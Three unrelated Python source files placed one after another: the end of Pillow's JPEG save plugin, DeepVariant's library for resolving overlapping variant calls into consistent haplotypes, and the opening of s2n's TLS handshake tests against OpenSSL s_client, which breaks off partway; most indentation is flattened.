"RGBX": "RGB",
"CMYK": "CMYK;I", # assume adobe conventions
"YCbCr": "YCbCr",
}
zigzag_index = ( 0, 1, 5, 6, 14, 15, 27, 28,
2, 4, 7, 13, 16, 26, 29, 42,
3, 8, 12, 17, 25, 30, 41, 43,
9, 11, 18, 24, 31, 40, 44, 53,
10, 19, 23, 32, 39, 45, 52, 54,
20, 22, 33, 38, 46, 51, 55, 60,
21, 34, 37, 47, 50, 56, 59, 61,
35, 36, 48, 49, 57, 58, 62, 63)
samplings = {(1, 1, 1, 1, 1, 1): 0,
(2, 1, 1, 1, 1, 1): 1,
(2, 2, 1, 1, 1, 1): 2,
}
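# Convert a {table_number: table} mapping of quantization tables into a flat
# list of tables, reordering each 64-entry table according to zigzag_index.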
def convert_dict_qtables(qtables):
qtables = [qtables[key] for key in range(len(qtables)) if key in qtables]
for idx, table in enumerate(qtables):
qtables[idx] = [table[i] for i in zigzag_index]
return qtables
def get_sampling(im):
    # There's no subsampling when images have only 1 layer
# (grayscale images) or when they are CMYK (4 layers),
# so set subsampling to default value.
#
# NOTE: currently Pillow can't encode JPEG to YCCK format.
# If YCCK support is added in the future, subsampling code will have
# to be updated (here and in JpegEncode.c) to deal with 4 layers.
if not hasattr(im, 'layers') or im.layers in (1, 4):
return -1
sampling = im.layer[0][1:3] + im.layer[1][1:3] + im.layer[2][1:3]
return samplings.get(sampling, -1)
def _save(im, fp, filename):
try:
rawmode = RAWMODE[im.mode]
except KeyError:
raise IOError("cannot write mode %s as JPEG" % im.mode)
info = im.encoderinfo
dpi = info.get("dpi", (0, 0))
quality = info.get("quality", 0)
subsampling = info.get("subsampling", -1)
qtables = info.get("qtables")
if quality == "keep":
quality = 0
subsampling = "keep"
qtables = "keep"
elif quality in presets:
preset = presets[quality]
quality = 0
subsampling = preset.get('subsampling', -1)
qtables = preset.get('quantization')
elif not isinstance(quality, int):
raise ValueError("Invalid quality setting")
else:
if subsampling in presets:
subsampling = presets[subsampling].get('subsampling', -1)
if isStringType(qtables) and qtables in presets:
qtables = presets[qtables].get('quantization')
if subsampling == "4:4:4":
subsampling = 0
elif subsampling == "4:2:2":
subsampling = 1
elif subsampling == "4:1:1":
subsampling = 2
elif subsampling == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
subsampling = get_sampling(im)
def validate_qtables(qtables):
if qtables is None:
return qtables
if isStringType(qtables):
try:
lines = [int(num) for line in qtables.splitlines()
for num in line.split('#', 1)[0].split()]
except ValueError:
raise ValueError("Invalid quantization table")
else:
qtables = [lines[s:s+64] for s in range(0, len(lines), 64)]
if isinstance(qtables, (tuple, list, dict)):
if isinstance(qtables, dict):
qtables = convert_dict_qtables(qtables)
elif isinstance(qtables, tuple):
qtables = list(qtables)
if not (0 < len(qtables) < 5):
raise ValueError("None or too many quantization tables")
for idx, table in enumerate(qtables):
try:
                    if len(table) != 64:
                        raise TypeError
                    table = array.array('B', table)
except TypeError:
raise ValueError("Invalid quantization table")
else:
qtables[idx] = list(table)
return qtables
if qtables == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
qtables = getattr(im, "quantization", None)
qtables = validate_qtables(qtables)
extra = b""
icc_profile = info.get("icc_profile")
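    # An ICC profile can exceed the 64K payload of a single APP2 marker, so
    # it is split across multiple markers, each tagged with its sequence
    # number and the total marker count (see the APP handler above).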
if icc_profile:
ICC_OVERHEAD_LEN = 14
MAX_BYTES_IN_MARKER = 65533
MAX_DATA_BYTES_IN_MARKER = MAX_BYTES_IN_MARKER - ICC_OVERHEAD_LEN
markers = []
while icc_profile:
markers.append(icc_profile[:MAX_DATA_BYTES_IN_MARKER])
icc_profile = icc_profile[MAX_DATA_BYTES_IN_MARKER:]
i = 1
for marker in markers:
size = struct.pack(">H", 2 + ICC_OVERHEAD_LEN + len(marker))
extra += (b"\xFF\xE2" + size + b"ICC_PROFILE\0" + o8(i) +
o8(len(markers)) + marker)
i += 1
# get keyword arguments
im.encoderconfig = (
quality,
# "progressive" is the official name, but older documentation
# says "progression"
# FIXME: issue a warning if the wrong form is used (post-1.1.7)
"progressive" in info or "progression" in info,
info.get("smooth", 0),
"optimize" in info,
info.get("streamtype", 0),
dpi[0], dpi[1],
subsampling,
qtables,
extra,
info.get("exif", b"")
)
    # If we optimize, libjpeg needs a buffer big enough to hold the whole image
    # in one shot. Guessing on the size, at im.size bytes (raw pixel size is
    # channels*size; this is a value that's been used in a django patch).
    # https://github.com/jdriscoll/django-imagekit/issues/50
bufsize = 0
if "optimize" in info or "progressive" in info or "progression" in info:
# keep sets quality to 0, but the actual value may be high.
if quality >= 95 or quality == 0:
bufsize = 2 * im.size[0] * im.size[1]
else:
bufsize = im.size[0] * im.size[1]
# The exif info needs to be written as one block, + APP1, + one spare byte.
# Ensure that our buffer is big enough
bufsize = max(ImageFile.MAXBLOCK, bufsize, len(info.get("exif", b"")) + 5)
ImageFile._save(im, fp, [("jpeg", (0, 0)+im.size, 0, rawmode)], bufsize)
def _save_cjpeg(im, fp, filename):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities.
import os
import subprocess
tempfile = im._dump()
subprocess.check_call(["cjpeg", "-outfile", filename, tempfile])
try:
os.unlink(tempfile)
    except Exception:
pass
##
# Factory for making JPEG and MPO instances
def jpeg_factory(fp=None, filename=None):
im = JpegImageFile(fp, filename)
mpheader = im._getmp()
try:
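        # 45057 (0xB001) is the MP tag holding the number of images.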
if mpheader[45057] > 1:
# It's actually an MPO
from .MpoImagePlugin import MpoImageFile
im = MpoImageFile(fp, filename)
except (TypeError, IndexError):
# It is really a JPEG
pass
return im
# --------------------------------------------------------------------
# Registry stuff
Image.register_open("JPEG", jpeg_factory, _accept)
Image.register_save("JPEG", _save)
Image.register_extension("JPEG", ".jfif")
Image.register_extension("JPEG", ".jpe")
Image.register_extension("JPEG", ".jpg")
Image.register_extension("JPEG", ".jpeg")
Image.register_mime("JPEG", "image/jpeg")
|
|
# Copyright 2017 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Library for resolving variants into consistent haplotypes.
The convolutional neural network that evaluates the probability of a candidate
variant being non-reference evaluates each candidate variant independently.
This can lead to overlapping variant calls that cannot actually exist in an
organism: for example, a diploid human cannot have overlapping variants for
which one is homozygous alternate and the other is heterozygous alternate, since
that implies three total alternate alleles.
This library tries to resolve overlapping variant calls into consistent
haplotypes by using the most likely configuration based on individual call
probabilities that is a valid set of two haplotypes. In rare cases where this
is not possible, the haplotypes are left unmodified.
"""
import copy
import itertools
from absl import flags
from absl import logging
import numpy as np
from third_party.nucleus.util import genomics_math
from third_party.nucleus.util import variant_utils
FLAGS = flags.FLAGS
flags.DEFINE_bool(
'disable_haplotype_resolution', False,
'If True, makes `maybe_resolve_conflicting_variants` a no-op.')
# The maximum number of overlapping variants to try to resolve into compatible
# haplotypes. This corresponds to generating 3^12 (= 531,441) possible variant
# configurations for diploid individuals.
_MAX_OVERLAPPING_VARIANTS_TO_RESOLVE = 12
def maybe_resolve_conflicting_variants(sorted_variants):
"""Yields Variant protos in sorted order after fixing conflicting haplotypes.
The input is an iterable of Variants in chromosome and position sorted order,
  with potential incompatibilities as described in this module's docstring.
  This function tries to resolve variants into valid haplotypes, though it is
  not guaranteed to do so if the variant composition is not amenable to this
  or it would be computationally intractable.
Args:
sorted_variants: Iterable of Variant protos. Sorted in coordinate order, but
with potentially incompatible haplotypes.
Yields:
Variant protos in coordinate-sorted order with no incompatible haplotypes.
"""
if FLAGS.disable_haplotype_resolution:
logging.info('disable_haplotype_resolution is True. '
'`maybe_resolve_conflicting_variants` has no effect.')
for v in sorted_variants:
yield v
else:
for overlapping_candidates in _group_overlapping_variants(sorted_variants):
for resolved_candidate in _maybe_resolve_mixed_calls(
overlapping_candidates):
yield resolved_candidate
def _group_overlapping_variants(sorted_variants):
"""Yields lists of Variant protos that overlap on the reference sequence.
Args:
sorted_variants: Iterable of Variant protos, sorted in coordinate order.
Yields:
Lists of variants within `sorted_variants` that overlap with each other on
the reference sequence.
"""
curr_variants = []
prev_chrom = None
prev_max_end = -1
for variant in sorted_variants:
if variant.reference_name != prev_chrom or variant.start >= prev_max_end:
if curr_variants:
yield curr_variants
curr_variants = [variant]
prev_chrom = variant.reference_name
prev_max_end = variant.end
else:
curr_variants.append(variant)
prev_max_end = max(prev_max_end, variant.end)
# Fencepost.
if curr_variants:
yield curr_variants
def _maybe_resolve_mixed_calls(overlapping_candidates):
"""Yields variants with compatible genotype calls in order.
This function differs from `_resolve_overlapping_variants` below in that the
input here is a block of all candidate calls that overlap in a region, which
may contain candidates that are deemed to be most likely reference calls.
We often tune DeepVariant to be highly sensitive. Consequently, there can be
many candidate calls that are predicted as reference. Since those do not
contribute to potential incompatibilities, we split them out from variants
predicted to contain non-reference genotypes since the computation of
compatible haplotypes is exponential in the number of inputs.
Args:
overlapping_candidates: list(Variant). A non-empty list of Variant protos in
coordinate-sorted order that overlap on the reference genome.
Yields:
Variant protos in coordinate-sorted order that try to resolve incompatible
haplotypes.
"""
# Short circuit the simplest case: A single variant in a region is compatible
# with itself by definition.
if len(overlapping_candidates) == 1:
yield overlapping_candidates[0]
return
def has_variation(candidate):
return _nonref_genotype_count(candidate) > 0
reference_calls = [c for c in overlapping_candidates if not has_variation(c)]
variant_calls = [v for v in overlapping_candidates if has_variation(v)]
resolved_variant_calls = []
for variant_group in _group_overlapping_variants(variant_calls):
resolved_variant_calls.extend(_resolve_overlapping_variants(variant_group))
# Merge the reference and resolved variants back together in sorted order.
# Note: This could be done in an interleaving fashion, but since the total
# number of variants in the input is nearly always < 20 this is not an issue.
for variant in sorted(
reference_calls + resolved_variant_calls,
key=variant_utils.variant_range_tuple):
yield variant
class _VariantCompatibilityCalculator(object):
"""Represents the reference genome spanned by overlapping Variants.
Each Variant affects a portion of the reference genome that is determined by
its start and end coordinates. For a given set of Variants, they are deemed
compatible if the total area along the reference genome that is called as
non-reference genotypes never exceeds the ploidy of the organism.
"""
def __init__(self, overlapping_variants):
"""Constructor.
Args:
overlapping_variants: list(Variant). The Variant protos of interest.
"""
min_start = min(v.start for v in overlapping_variants)
self.variant_indices = [
(v.start - min_start, v.end - min_start) for v in overlapping_variants
]
self.size = max(v.end - min_start for v in overlapping_variants)
def all_variants_compatible(self, nonref_genotype_counts, ploidy=2):
"""Returns True if and only if all variants are compatible.
Args:
nonref_genotype_counts: list of ints in [0, ploidy]. Element i in this
list represents the number of non-reference genotypes for the i'th
variant.
ploidy: int. The ploidy of the individual.
Returns:
True if and only if the variants are compatible.
Raises:
ValueError: nonref_genotype_counts is not the same length as
self.variant_indices.
ValueError: nonref_genotype_counts does not contain elements in [0,
ploidy].
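    Example (sketch): for two fully-overlapping variants and ploidy 2,
    `all_variants_compatible([1, 1])` is True (two non-reference genotypes
    in the span), while `all_variants_compatible([1, 2])` is False (three).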
"""
if len(nonref_genotype_counts) != len(self.variant_indices):
raise ValueError(
'Variant counts must have same length as variant indices.')
if not all(0 <= cnt <= ploidy for cnt in nonref_genotype_counts):
raise ValueError('Invalid variant allele count for ploidy {}: {}'.format(
ploidy, nonref_genotype_counts))
alts_in_span = np.zeros(self.size, dtype=int)
for cnt, (start, end) in zip(nonref_genotype_counts, self.variant_indices):
alts_in_span[start:end] += cnt
return np.all(alts_in_span <= ploidy)
class _LikelihoodAggregator(object):
"""Container class for genotype likelihoods of allele configurations.
When evaluating valid genotype configurations across multiple variants, we
calculate the likelihood of each configuration. To then calculate the marginal
likelihoods for each variant's genotypes, for each genotype we need to sum the
probabilities of all configurations that include that genotype.
For numerical stability we do this by storing the genotype likelihoods
= log10(p) and then aggregate using the log-sum-exp trick.
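  Concretely, for a genotype whose contributing configurations have
  log10-likelihoods l_1..l_n, the unnormalized marginal is
  log10(10**l_1 + ... + 10**l_n), computed stably with
  genomics_math.log10sumexp and then normalized across genotypes.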
"""
def __init__(self, num_alts):
"""Constructor.
Args:
num_alts: int. The number of alternate alleles in the variant.
"""
self._num_likelihoods = variant_utils.genotype_likelihood_index(
(num_alts, num_alts)) + 1
# At each GL index, we keep a list that will include the joint GL across all
# variants that include that particular set of allele indices for this
# variant.
self._genotype_likelihood_containers = []
for _ in range(self._num_likelihoods):
self._genotype_likelihood_containers.append([])
def add(self, allele_indices, likelihood):
"""Add some likelihood to a particular allele configuration.
Args:
allele_indices: Pair of (g1, g2) ints representing the genotype.
likelihood: float. log10(probability of this genotype configuration).
"""
ix = variant_utils.genotype_likelihood_index(allele_indices)
self._genotype_likelihood_containers[ix].append(likelihood)
def scaled_likelihoods(self):
"""Returns the scaled likelihood of each genotype."""
if not all(bool(x) for x in self._genotype_likelihood_containers):
raise ValueError(
'All genotypes must have some probability mass: {}'.format(
self._genotype_likelihood_containers))
return genomics_math.normalize_log10_probs([
genomics_math.log10sumexp(unscaled)
for unscaled in self._genotype_likelihood_containers
])
def most_likely_allele_indices(self):
"""Returns allele indices for the genotype with the largest likelihood."""
ix = np.argmax(self.scaled_likelihoods())
return variant_utils.allele_indices_for_genotype_likelihood_index(
ix, ploidy=2)
def _resolve_overlapping_variants(overlapping_variants):
"""Yields variants with compatible haplotypes, if possible.
Args:
overlapping_variants: list(Variant). A non-empty list of Variant protos in
coordinate-sorted order that overlap on the reference genome and are
predicted to contain alternate allele genotypes.
Yields:
Variant protos in coordinate-sorted order that try to resolve incompatible
haplotypes.
"""
# Short circuit the simplest case: A single variant in a region is compatible
# with itself by definition.
if len(overlapping_variants) == 1:
yield overlapping_variants[0]
return
# If the actual genotype calls are compatible, we can safely return those
# since they would be the most likely configuration also when restricting to
# only valid configurations of genotype calls.
calculator = _VariantCompatibilityCalculator(overlapping_variants)
nonref_counts = [_nonref_genotype_count(v) for v in overlapping_variants]
if calculator.all_variants_compatible(nonref_counts):
logging.vlog(2, 'Overlapping variants are naturally compatible: %s',
overlapping_variants)
for variant in overlapping_variants:
yield variant
return
# The actual genotype calls produce an inconsistent haplotype. If the number
# of affected variants is "too large", avoid processing since this is an
# exponential process.
if len(overlapping_variants) > _MAX_OVERLAPPING_VARIANTS_TO_RESOLVE:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, and there are too '
'many to exhaustively search (%s). Returning variants without '
'modification, beginning with %s.', len(overlapping_variants),
overlapping_variants[0])
for variant in overlapping_variants:
yield variant
return
# Otherwise, the actual genotype calls are incompatible. Since the genotype
# likelihoods are generally well-calibrated, we examine all configurations of
# genotypes that create compatible haplotypes and retain the single
# configuration with the highest joint likelihood across all variants as the
# proposed genotype assignment. Separately, we rescale the likelihood of each
# individual variant using only the valid genotype configurations. If the
# results are concordant (i.e., the genotype predicted by the marginal
# likelihood for each variant is the same as the genotype predicted when
# maximizing the joint likelihood across all variants), we return variants
# with those calls and the rescaled likelihoods. Otherwise, we log a warning
# and emit the original (incompatible) variants.
#
# For example, a biallelic deletion with probabilities of homref, het, homalt
# = 0.01, 0.9, 0.09 and inside it a biallelic SNP with probs 0.02, 0.48, 0.5.
# Naively this would be called as a heterozygous indel and a homozygous SNP,
# which is impossible as there are three total alternate genotypes. The
# algorithm does the following:
#
# Indel SNP Joint prob
# 0/0 0/0 0.01 * 0.02 = 0.0002
# 0/0 0/1 0.01 * 0.48 = 0.0048
# 0/0 1/1 0.01 * 0.50 = 0.0050
# 0/1 0/0 0.90 * 0.02 = 0.0180
# 0/1 0/1 0.90 * 0.48 = 0.4320*
# 0/1 1/1 <invalid> = 0
# 1/1 0/0 0.09 * 0.02 = 0.0018
# 1/1 0/1 <invalid> = 0
# 1/1 1/1 <invalid> = 0
#
# So using the highest joint likelihood, we predict het indel and het SNP.
#
# The marginal probability of each genotype for the indel is:
# 0/0: 0.0002 + 0.0048 + 0.0050 = 0.01
# 0/1: 0.0180 + 0.4320 = 0.45
# 1/1: 0.0018 = 0.0018
#
# which after normalizing to sum to 1 is roughly 0.022, 0.974, 0.004.
# The marginal probability for the SNP, after performing similar
# calculations, is 0.043, 0.946, 0.011. So the marginals also predict a het
# indel and a het SNP. Since the two calculations agree, we use this
# genotype call and modified likelihoods.
#
# First, we find all non-reference count configurations that are compatible.
# This represents each variant solely based on its number of non-reference
# genotypes, and assumes that variants are compatible if the total number of
# non-reference genotypes at a single position is at most two. By using
# non-reference counts, we avoid testing multiple allele configurations that
# will return the same result (e.g. a variant with two possible alternate
# alleles has three allele configurations that are homozygous alternate
# [1/1, 1/2, 2/2] and either all or none of them will be valid depending on
# the variants it interacts with).
valid_nonref_count_configurations = [
conf
for conf in itertools.product([0, 1, 2], repeat=len(overlapping_variants))
if calculator.all_variants_compatible(conf)
]
  # Next, we find the single compatible genotype assignment with the highest
  # joint likelihood, and separately track the total likelihood contributed to
  # each genotype of every variant so the marginal likelihoods can be rescaled.
likelihood_aggregators = [
_LikelihoodAggregator(len(v.alternate_bases))
for v in overlapping_variants
]
most_likely_allele_indices_config = None
most_likely_likelihood = None
for nonref_count_config in valid_nonref_count_configurations:
for allele_indices_config in _get_all_allele_indices_configurations(
overlapping_variants, nonref_count_config):
config_likelihood = _allele_indices_configuration_likelihood(
overlapping_variants, allele_indices_config)
if (most_likely_likelihood is None or
config_likelihood > most_likely_likelihood):
most_likely_likelihood = config_likelihood
most_likely_allele_indices_config = allele_indices_config
for aggregator, allele_indices in zip(likelihood_aggregators,
allele_indices_config):
aggregator.add(allele_indices, config_likelihood)
marginal_allele_indices_config = tuple(
agg.most_likely_allele_indices() for agg in likelihood_aggregators)
if marginal_allele_indices_config == most_likely_allele_indices_config:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, but the genotype '
'configuration with the most likely joint likelihood is the same as '
'that from the scaled marginal likelihoods: %s',
overlapping_variants[0])
# Collapse the probabilities of all configurations to a single GL for each
# allele, independently for each variant.
scaled_gls = [agg.scaled_likelihoods() for agg in likelihood_aggregators]
for variant, allele_indices, gls in zip(overlapping_variants,
most_likely_allele_indices_config,
scaled_gls):
newvariant = copy.deepcopy(variant)
call = variant_utils.only_call(newvariant)
call.genotype[:] = allele_indices
call.genotype_likelihood[:] = gls
yield newvariant
else:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, and the genotype '
'configuration with the most likely joint likelihood is different from '
'that using the scaled marginal likelihoods: %s',
overlapping_variants[0])
# redacted
for variant in overlapping_variants:
yield variant
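# Illustrative sketch (not part of the calling pipeline): the joint-vs-marginal
# reconciliation described above, applied to the worked biallelic indel + SNP
# example. It is hedged: it uses plain probabilities rather than the log10
# genotype likelihoods handled by _LikelihoodAggregator, and "compatible" means
# at most two non-reference alleles in total across the overlapping variants.
def _demo_joint_vs_marginal_reconciliation():
  indel_probs = {0: 0.01, 1: 0.90, 2: 0.09}  # P(hom-ref), P(het), P(hom-alt)
  snp_probs = {0: 0.02, 1: 0.48, 2: 0.50}
  # Joint probability of every compatible configuration of non-ref counts.
  joint = {(i, s): indel_probs[i] * snp_probs[s]
           for i, s in itertools.product([0, 1, 2], repeat=2)
           if i + s <= 2}
  best = max(joint, key=joint.get)  # (1, 1): het indel and het SNP.
  total = sum(joint.values())
  # Rescaled marginals, normalized over the valid configurations only.
  indel_marginal = [
      sum(p for (i, _), p in joint.items() if i == g) / total for g in (0, 1, 2)
  ]
  snp_marginal = [
      sum(p for (_, s), p in joint.items() if s == g) / total for g in (0, 1, 2)
  ]
  marginal_best = (indel_marginal.index(max(indel_marginal)),
                   snp_marginal.index(max(snp_marginal)))
  return best == marginal_best  # Concordant: both pick het/het.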
def _get_all_allele_indices_configurations(variants,
nonref_count_configuration):
"""Returns an iterable of allele configurations that satisfy the genotype.
Args:
variants: list(Variant). The list of variants for which to generate
configurations of valid allele_indices.
nonref_count_configuration: list(int). The list of numbers of non-reference
genotypes that should be generated for each variant.
Returns:
Iterable of lists of allele indices to assign to each Variant to satisfy the
desired configuration of number of non-reference genotypes for each variant.
Raises:
ValueError: variants and nonref_count_configuration do not have the same
length.
"""
if len(variants) != len(nonref_count_configuration):
raise ValueError(
'len(variants) must equal len(nonref_count_configuration): {} vs {}'
.format(len(variants), len(nonref_count_configuration)))
allele_indices_configs = [
variant_utils.allele_indices_with_num_alts(variant, num_alts, ploidy=2)
for variant, num_alts in zip(variants, nonref_count_configuration)
]
return itertools.product(*allele_indices_configs)
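# Hedged sketch of the configurations produced above, using a tiny local
# stand-in for variant_utils.allele_indices_with_num_alts restricted to
# diploid genotypes. The helper below is an illustrative assumption, not the
# real implementation.
def _demo_allele_indices_configurations():
  def diploid_allele_indices(num_alt_alleles, num_alts):
    # Sorted diploid genotype pairs with exactly `num_alts` non-reference
    # alleles drawn from alternate alleles 1..num_alt_alleles.
    alts = range(1, num_alt_alleles + 1)
    if num_alts == 0:
      return [(0, 0)]
    if num_alts == 1:
      return [(0, a) for a in alts]
    return [(a, b) for a in alts for b in alts if a <= b]

  # A het call on a biallelic variant combined with a hom-alt call on a
  # multiallelic (two-alt) variant yields three configurations, matching the
  # [1/1, 1/2, 2/2] example in the comments above:
  configs = itertools.product(diploid_allele_indices(1, 1),
                              diploid_allele_indices(2, 2))
  return list(configs)  # [((0, 1), (1, 1)), ((0, 1), (1, 2)), ((0, 1), (2, 2))]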
def _allele_indices_configuration_likelihood(variants, allele_indices_config):
"""Returns the joint likelihood of the alleles given to the variants.
Args:
variants: list(Variant). The variants with associated likelihoods.
allele_indices_config: list((int, int)). The allele indices to assign to
each variant.
Returns:
The joint likelihood of the particular allele configuration.
Raises:
ValueError: variants and allele_indices_config do not have the same length.
"""
if len(variants) != len(allele_indices_config):
raise ValueError(
'len(variants) must equal len(allele_indices_config): {} vs {}'.format(
len(variants), len(allele_indices_config)))
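  # Genotype likelihoods are log-scaled, so the joint likelihood of
  # independent variants is the sum of their individual likelihoods.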
retval = 0
for variant, alleles in zip(variants, allele_indices_config):
retval += variant_utils.genotype_likelihood(
variant_utils.only_call(variant), alleles)
return retval
def _nonref_genotype_count(variant):
"""Returns the number of non-reference alleles in the called genotype."""
return sum(g > 0 for g in variant_utils.only_call(variant).genotype)
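# Quick illustration of the non-reference count convention used above, applied
# directly to diploid genotype tuples (stand-ins for VariantCall.genotype):
# hom-ref counts 0, het counts 1, and hom-alt or het-alt genotypes count 2.
def _demo_nonref_counts():
  genotypes = [(0, 0), (0, 1), (1, 1), (1, 2)]
  return [sum(g > 0 for g in genotype) for genotype in genotypes]  # [0, 1, 2, 2]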
|
|
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
"""
Handshake tests using Openssl s_client against s2nd
Openssl 1.1.0 removed SSLv3, 3DES, and RC4, so we won't have coverage there.
"""
import argparse
import os
import sys
import subprocess
import itertools
import multiprocessing
import threading
import uuid
import re
import string
from os import environ
from multiprocessing.pool import ThreadPool
from s2n_test_constants import *
from time import sleep
PROTO_VERS_TO_S_CLIENT_ARG = {
S2N_TLS10 : "-tls1",
S2N_TLS11 : "-tls1_1",
S2N_TLS12 : "-tls1_2",
}
S_CLIENT_SUCCESSFUL_OCSP="OCSP Response Status: successful"
S_CLIENT_NEGOTIATED_CIPHER_PREFIX="Cipher : "
S_CLIENT_HOSTNAME_MISMATCH="verify error:num=62:Hostname mismatch"
# Server certificate starts on the line after this one.
S_CLIENT_START_OF_SERVER_CERTIFICATE="Server certificate"
S_CLIENT_LAST_CERTIFICATE_LINE_PATTERN=re.compile("-----END.*CERTIFICATE-----")
S_CLIENT_SERVER_NAME_EXTENSION='TLS server extension "server name"'
class TlsExtensionServerName:
    @staticmethod
    def s_client_validate(s_client_out):
for line in s_client_out.splitlines():
if S_CLIENT_SERVER_NAME_EXTENSION in line:
return 0
print("Did not find the ServerName extension as expected!")
return -1
use_corked_io=False
def cleanup_processes(*processes):
for p in processes:
p.kill()
p.wait()
def validate_data_transfer(expected_data, s_client_out, s2nd_out):
"""
    Verify that the application data written between s_client and s2nd is encrypted and decrypted successfully.
"""
found = 0
for line in s2nd_out.splitlines():
if expected_data in line:
found = 1
break
if found == 0:
print ("Did not find " + expected_data + " in output from s2nd")
return -1
found = 0
for line in s_client_out.splitlines():
if expected_data in line:
found = 1
break
if found == 0:
print ("Did not find " + expected_data + " in output from s_client")
return -1
return 0
def validate_resume(s2nd_out):
"""
Verify that s2nd properly resumes sessions.
"""
resume_count = 0
for line in s2nd_out.splitlines():
if line.startswith("Resumed session"):
resume_count += 1
if resume_count == 5:
break
if resume_count != 5:
print ("Validate resumption failed")
return -1
return 0
def validate_ocsp(s_client_out):
"""
Verify that stapled OCSP response is accepted by s_client.
"""
    for line in s_client_out.splitlines():
        if S_CLIENT_SUCCESSFUL_OCSP in line:
            return 0
    print("Validate OCSP failed")
return -1
def find_expected_cipher(expected_cipher, s_client_out):
"""
Make sure s_client and s2nd negotiate the cipher suite we expect
"""
    full_expected_string = S_CLIENT_NEGOTIATED_CIPHER_PREFIX + expected_cipher
    for line in s_client_out.splitlines():
        if full_expected_string in line:
            return 0
    print("Failed to find " + expected_cipher + " in s_client output")
return -1
def validate_hostname(s_client_out):
"""
Make sure that s_client did not error on hostname mismatch.
    This function is only valid if s_client was invoked with the "-verify_hostname" argument.
"""
for line in s_client_out.splitlines():
if S_CLIENT_HOSTNAME_MISMATCH in line:
print("Server certificate hostname did not match client server_name")
return 1
return 0
def validate_selected_certificate(s_client_out, expected_cert_path):
"""
Make sure that the server certificate that s_client sees is the certificate we expect.
"""
start_found = 0
cert_str = ""
for line in s_client_out.splitlines():
# Spin until we get to the start of the cert
if start_found == 0:
if S_CLIENT_START_OF_SERVER_CERTIFICATE in line:
start_found = 1
else:
cert_str+=line
cert_str+="\n"
# reached the end of the cert.
if S_CLIENT_LAST_CERTIFICATE_LINE_PATTERN.match(line):
break
expected_cert_str = open(expected_cert_path).read()
if "".join(cert_str.split()) != "".join(expected_cert_str.split()):
print("The expected certificate was not served!!!")
print("The cert I expected: \n" + expected_cert_str)
print("The cert I got: \n" + cert_str)
return -1
return 0
def read_process_output_until(process, marker):
    output = ""
    while True:
        line = process.stdout.readline().decode("utf-8")
        output += line
        # Stop on the marker, or on EOF if the process exits before printing it
        # (readline() returns "" at EOF, which would otherwise spin forever).
        if marker in line or not line:
            return output
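# A hedged sketch (not used by these tests): readline() above still blocks for
# as long as the peer stays alive without printing the marker. A hypothetical
# bounded variant can arm a threading.Timer that kills the process, so the
# pending read unblocks at EOF. `timeout_seconds` is an illustrative parameter.
def read_process_output_until_with_timeout(process, marker, timeout_seconds=30):
    timer = threading.Timer(timeout_seconds, process.kill)
    timer.start()
    try:
        return read_process_output_until(process, marker)
    finally:
        timer.cancel()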
def try_handshake(endpoint, port, cipher, ssl_version, server_name=None, strict_hostname=False, server_cert=None, server_key=None,
server_cert_key_list=None, expected_server_cert=None, server_cipher_pref=None, ocsp=None, sig_algs=None, curves=None, resume=False, no_ticket=False,
prefer_low_latency=False, enter_fips_mode=False, client_auth=None, client_cert=DEFAULT_CLIENT_CERT_PATH,
client_key=DEFAULT_CLIENT_KEY_PATH, expected_cipher=None, expected_extensions=None):
"""
Attempt to handshake against s2nd listening on `endpoint` and `port` using Openssl s_client
    :param str endpoint: host for s2nd to bind to
:param int port: port for s2nd to listen on
:param str cipher: ciphers for Openssl s_client to offer. See https://www.openssl.org/docs/man1.0.2/apps/ciphers.html
:param int ssl_version: SSL version for s_client to use
:param str server_name: server_name value for s_client to send
:param bool strict_hostname: whether s_client should strictly check to see if server certificate matches the server_name
:param str server_cert: path to certificate for s2nd to use
:param str server_key: path to private key for s2nd to use
:param list server_cert_key_list: a list of (cert_path, key_path) tuples for multicert tests.
    :param str expected_server_cert: Path to the server certificate that is expected to be sent to s_client.
:param str ocsp: path to OCSP response file for stapling
:param str sig_algs: Signature algorithms for s_client to offer
:param str curves: Elliptic curves for s_client to offer
:param bool resume: True if s_client should try to reconnect to s2nd and reuse the same TLS session. False for normal negotiation.
:param bool no_ticket: True if s2n server should not use session ticket to resume the same TLS session.
:param bool prefer_low_latency: True if s2nd should use 1500 for max outgoing record size. False for default max.
